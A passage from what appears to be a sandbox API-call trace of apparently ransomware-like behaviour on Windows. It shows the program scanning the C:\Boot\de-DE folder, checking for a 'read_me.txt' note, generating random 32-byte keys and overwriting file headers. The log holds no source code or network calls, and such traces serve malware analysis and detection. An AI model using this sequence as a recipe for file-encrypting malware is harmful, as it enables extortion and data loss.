ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.683] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 33 [0073.683] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.683] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1677b0b0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x1677b0b0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1677b0b0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.683] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\read_me.txt") returned 29 [0073.683] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\read_me.txt" (normalized: "c:\\boot\\de-de\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.683] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.683] CloseHandle (hObject=0x7a8) returned 1 [0073.683] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1677b0b0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x1677b0b0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1677b0b0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x78e0000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.683] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0073.683] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\read_me.txt") returned 29 [0073.683] GetProcessHeap () returned 0x280000 [0073.683] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a30078 | out: hHeap=0x280000) returned 1 [0073.683] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 4 [0073.683] GetProcessHeap () returned 0x280000 [0073.683] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a40080 | out: hHeap=0x280000) returned 1 [0073.683] SetFilePointerEx (in: hFile=0x7ac, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.683] ReadFile (in: hFile=0x7ac, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0073.683] SetFilePointerEx (in: hFile=0x7ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.684] GetProcessHeap () returned 0x280000 [0073.684] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0073.684] GetProcessHeap () returned 0x280000 [0073.684] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0073.684] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0073.684] GetProcessHeap () returned 0x280000 [0073.684] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0073.684] ReadFile (in: hFile=0x7ac, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0073.684] GetProcessHeap () returned 0x280000 [0073.684] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0073.684] GetProcessHeap () returned 0x280000 [0073.684] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0073.684] GetProcessHeap () returned 0x280000 [0073.684] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0073.684] GetProcessHeap () returned 0x280000 [0073.684] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0073.684] GetProcessHeap () returned 0x280000 [0073.684] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0073.684] GetProcessHeap () returned 0x280000 [0073.684] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0073.684] GetProcessHeap () returned 0x280000 [0073.684] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.684] GetProcessHeap () returned 0x280000 [0073.684] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.684] GetProcessHeap () returned 0x280000 [0073.684] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.684] GetProcessHeap () returned 0x280000 [0073.685] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.685] GetProcessHeap () returned 0x280000 [0073.685] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d94210 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d94210 | out: hHeap=0x280000) returned 1 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0073.686] GetProcessHeap () returned 0x280000 [0073.686] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.687] GetProcessHeap () returned 0x280000 [0073.687] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0073.687] GetProcessHeap () returned 0x280000 [0073.687] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.687] GetProcessHeap () returned 0x280000 [0073.687] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.687] GetProcessHeap () returned 0x280000 [0073.687] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.687] GetProcessHeap () returned 0x280000 [0073.687] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.687] GetProcessHeap () returned 0x280000 [0073.687] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.687] GetProcessHeap () returned 0x280000 [0073.687] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.687] GetProcessHeap () returned 0x280000 [0073.687] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.687] GetProcessHeap () returned 0x280000 [0073.687] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.687] GetProcessHeap () returned 0x280000 [0073.687] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.687] GetProcessHeap () returned 0x280000 [0073.687] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.687] GetProcessHeap () returned 0x280000 [0073.687] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.687] GetProcessHeap () returned 0x280000 [0073.687] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.687] GetProcessHeap () returned 0x280000 [0073.687] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.688] GetProcessHeap () returned 0x280000 [0073.688] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.688] GetProcessHeap () returned 0x280000 [0073.688] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.688] GetProcessHeap () returned 0x280000 [0073.688] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.688] GetProcessHeap () returned 0x280000 [0073.688] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.688] GetProcessHeap () returned 0x280000 [0073.688] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.688] GetProcessHeap () returned 0x280000 [0073.688] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.688] GetProcessHeap () returned 0x280000 [0073.688] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.688] GetProcessHeap () returned 0x280000 [0073.688] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.688] GetProcessHeap () returned 0x280000 [0073.688] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.688] GetProcessHeap () returned 0x280000 [0073.688] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.688] GetProcessHeap () returned 0x280000 [0073.688] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.688] GetProcessHeap () returned 0x280000 [0073.688] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dd2c28 [0073.688] GetProcessHeap () returned 0x280000 [0073.688] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.688] GetProcessHeap () returned 0x280000 [0073.688] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0073.688] GetProcessHeap () returned 0x280000 [0073.689] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0073.689] GetProcessHeap () returned 0x280000 [0073.689] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.689] GetProcessHeap () returned 0x280000 [0073.689] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0073.689] SetFilePointerEx (in: hFile=0x7ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.689] WriteFile (in: hFile=0x7ac, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0073.690] WriteFile (in: hFile=0x7ac, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0073.690] GetProcessHeap () returned 0x280000 [0073.690] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0073.690] GetProcessHeap () returned 0x280000 [0073.690] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0073.690] GetProcessHeap () returned 0x280000 [0073.690] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0073.690] CloseHandle (hObject=0x7ac) returned 1 [0073.690] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 0 [0073.691] SetFilePointerEx (in: hFile=0x7b0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.691] ReadFile (in: hFile=0x7b0, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0073.691] SetFilePointerEx (in: hFile=0x7b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.691] GetProcessHeap () returned 0x280000 [0073.691] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0073.691] GetProcessHeap () returned 0x280000 [0073.691] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0073.691] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0073.691] GetProcessHeap () returned 0x280000 [0073.691] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0073.691] ReadFile (in: hFile=0x7b0, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0073.691] GetProcessHeap () returned 0x280000 [0073.691] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0073.691] GetProcessHeap () returned 0x280000 [0073.691] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0073.691] GetProcessHeap () returned 0x280000 [0073.691] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0073.691] GetProcessHeap () returned 0x280000 [0073.691] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0073.691] GetProcessHeap () returned 0x280000 [0073.691] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0073.691] GetProcessHeap () returned 0x280000 [0073.691] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0073.691] GetProcessHeap () returned 0x280000 [0073.691] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.691] GetProcessHeap () returned 0x280000 [0073.691] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.691] GetProcessHeap () returned 0x280000 [0073.691] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.691] GetProcessHeap () returned 0x280000 [0073.691] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.691] GetProcessHeap () returned 0x280000 [0073.692] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.692] GetProcessHeap () returned 0x280000 [0073.692] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.692] GetProcessHeap () returned 0x280000 [0073.693] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.693] GetProcessHeap () returned 0x280000 [0073.693] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.693] GetProcessHeap () returned 0x280000 [0073.693] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.693] GetProcessHeap () returned 0x280000 [0073.693] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.693] GetProcessHeap () returned 0x280000 [0073.693] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.693] GetProcessHeap () returned 0x280000 [0073.693] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.693] GetProcessHeap () returned 0x280000 [0073.693] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.693] GetProcessHeap () returned 0x280000 [0073.693] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.693] GetProcessHeap () returned 0x280000 [0073.693] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.693] GetProcessHeap () returned 0x280000 [0073.693] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d94210 [0073.693] GetProcessHeap () returned 0x280000 [0073.693] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.693] GetProcessHeap () returned 0x280000 [0073.693] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0073.693] GetProcessHeap () returned 0x280000 [0073.693] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d94210 | out: hHeap=0x280000) returned 1 [0073.693] GetProcessHeap () returned 0x280000 [0073.693] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0073.693] GetProcessHeap () returned 0x280000 [0073.693] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0073.693] GetProcessHeap () returned 0x280000 [0073.693] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0073.693] GetProcessHeap () returned 0x280000 [0073.693] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0073.694] GetProcessHeap () returned 0x280000 [0073.694] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.694] GetProcessHeap () returned 0x280000 [0073.694] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0073.694] GetProcessHeap () returned 0x280000 [0073.694] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.694] GetProcessHeap () returned 0x280000 [0073.694] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.694] GetProcessHeap () returned 0x280000 [0073.694] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.694] GetProcessHeap () returned 0x280000 [0073.694] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.694] GetProcessHeap () 